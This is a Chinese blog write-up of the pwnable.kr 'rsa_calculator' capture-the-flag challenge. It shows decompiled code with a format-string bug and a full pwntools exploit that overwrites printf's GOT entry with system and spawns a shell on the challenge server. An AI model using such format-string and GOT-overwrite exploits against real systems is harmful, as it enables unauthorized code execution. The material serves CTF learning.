pwnable.kr rsa_calculator

RSA_decrypt中有格式化字符串漏洞:


undefined8 RSA_decrypt(void)

{
  int iVar1;
  uint uVar2;
  size_t sVar3;
  long lVar4;
  undefined8 *puVar5;
  size_t in_R8;
  long in_FS_OFFSET;
  bool bVar6;
  byte bVar7;
  int data_len;
  uint i;
  int j;
  int idx;
  int local_62c;
  char local_628;
  char local_627;
  undefined local_626;
  char ch;
  char acStack1560 [1024];
  undefined8 local_218 [65];
  long canary;
  
  bVar7 = 0;
  canary = *(long *)(in_FS_OFFSET + 0x28);
  if (is_set == 0) {
    puts("set RSA key first");
  }
  else {
    data_len = 0;
    printf("how long is your data?(max=1024) : ");
    __isoc99_scanf(&%d,&data_len);
    if (data_len < 0x401) {
      i = 0;
      fgetc(stdin);
      puts("paste your hex encoded data");
      while (bVar6 = data_len != 0, data_len = data_len + -1, bVar6) {
        sVar3 = fread(&ch,1,1,stdin);
        local_62c = (int)sVar3;
        if (local_62c == 0) {
                    /* WARNING: Subroutine does not return */
          exit(0);
        }
        if (ch == '\n') break;
        acStack1560[(int)i] = ch;
        i = i + 1;
      }
      puVar5 = local_218;
      for (lVar4 = 0x40; lVar4 != 0; lVar4 = lVar4 + -1) {
        *puVar5 = 0;
        puVar5 = puVar5 + (ulong)bVar7 * -2 + 1;
      }
      idx = 0;
      for (j = 0; j < (int)(i * 2); j = j + 2) {
        local_628 = acStack1560[j];
        local_627 = acStack1560[j + 1];
        local_626 = 0;
        lVar4 = (long)idx;
        idx = idx + 1;
        __isoc99_sscanf(&local_628,&DAT_0040170b,(long)local_218 + lVar4);
      }
      puVar5 = local_218;
      memcpy(g_ebuf,puVar5,(long)(int)i);
      j = 0;
      while( true ) {
        uVar2 = i;
        if ((int)i < 0) {
          uVar2 = i + 7;
        }
        if ((int)uVar2 >> 3 <= j) break;
        iVar1 = decrypt((EVP_PKEY_CTX *)(ulong)*(uint *)(g_ebuf + (long)j * 4),(uchar *)&pri,
                        (size_t *)(ulong)(i + 7),(uchar *)puVar5,in_R8);
        g_pbuf[j] = (char)iVar1;
        j = j + 1;
      }
      g_pbuf[j] = 0;
      puts("- decrypted result -");
      printf(g_pbuf);
      putchar(10);
    }
    else {
      puts("data length exceeds buffer size");
    }
  }
  if (canary == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

RSA_encrypt实际上只是简单的把ascii字符转换为16进制字符表示,写exp时不需要关心RSA相关的部分,只需要随便设p、q、e、d。
还有需要注意的一个点是整个循环的过程中并没有清理栈,上一次栈中的局部变量依然会保留,和格式化字符串漏洞一起使用能写任意内存。
这题没开NX和Full RELRO,可以在栈上写shellcode,也可以选择改got表,甚至ret2libc也行。我选择了改got表,把got表中printf的值改为system后,再将"/bin/sh"写入g_pbuf就可以得到shell。
exp:

from pwn import *

context(log_level="debug", arch="amd64", os="linux")
# r = process("./rsa_calculator")
r = remote("pwnable.kr", 9012)
binary = ELF("./rsa_calculator")

printf_got = binary.got["printf"]
system_plt = binary.plt["system"]  # 0x4007c0: system@plt


def encrypt(s: str) -> bytes:
    res = []
    for i in s:
        res.append(format(ord(i), "0x").ljust(8, "0"))
    return "".join(res).encode("utf-8")


def recvmenu():
    r.recvuntil(b"exit\n")


def decrypt(msg: bytes):
    recvmenu()
    r.sendline(b"3")
    r.recvuntil(b" : ")
    r.sendline(b"-1")
    r.recvuntil(b"\n")
    r.sendline(msg)


def set_key(p: int, q: int, e: int, d: int):
    recvmenu()
    r.sendline(b"1")
    r.recvuntil(b"p : ")
    r.sendline(str(p).encode("utf-8"))
    r.recvuntil(b"q : ")
    r.sendline(str(q).encode("utf-8"))
    r.recvuntil(b"e : ")
    r.sendline(str(e).encode("utf-8"))
    r.recvuntil(b"d : ")
    r.sendline(str(d).encode("utf-8"))


set_key(100, 100, 1, 1)
decrypt(encrypt("a" * 40) + p64(printf_got + 4) + p64(printf_got + 2) + p64(printf_got))
decrypt(encrypt("%52$n%64c%53$hn%1920c%54$hn"))
recvmenu()
r.recvline()
r.sendline(b"3")
r.sendline(b"-1")
r.recvuntil(b"\n")
r.sendline(encrypt("/bin/sh"))
r.interactive()

值得注意的是理论上用于填充的junk需要27*8字节,因为写格式化字符串需要27字节,而在本机和远程上跑都需要多于27字节的junk,而且需要用到的最少junk长度也不相同,这一点目前还没弄明白。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 217,734评论 6 505
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,931评论 3 394
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 164,133评论 0 354
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,532评论 1 293
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,585评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,462评论 1 302
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,262评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,153评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,587评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,792评论 3 336
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,919评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,635评论 5 345
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,237评论 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,855评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,983评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,048评论 3 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,864评论 2 354

推荐阅读更多精彩内容

  • 0x01 fd 文件描述符 0、1、2分别代表标准输入、标准输出和标准错误,所以输入0x1234的十进制值,再次...
    Nevv阅读 5,843评论 0 6
  • 0x01 codemap 1. 题目描述 2. 题目分析 我们直接看IDA反汇编后的代码: 经过分析我们可以看到,...
    Nevv阅读 607评论 0 4
  • pwnable.kr之brainfuck.md Overview 题目给了一个简陋版的brainfuck解释器, ...
    hyrathon阅读 896评论 0 0
  • 首先我们登陆pwnable.kr,这里是道溢出题目,在题目提示中已经可以看出来了,我们下载一下bof文件,已经看一...
    酱瓜_01ce阅读 1,134评论 0 0
  • 0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施,然后查看IDA下的汇编代码,...
    Nevv阅读 1,683评论 0 2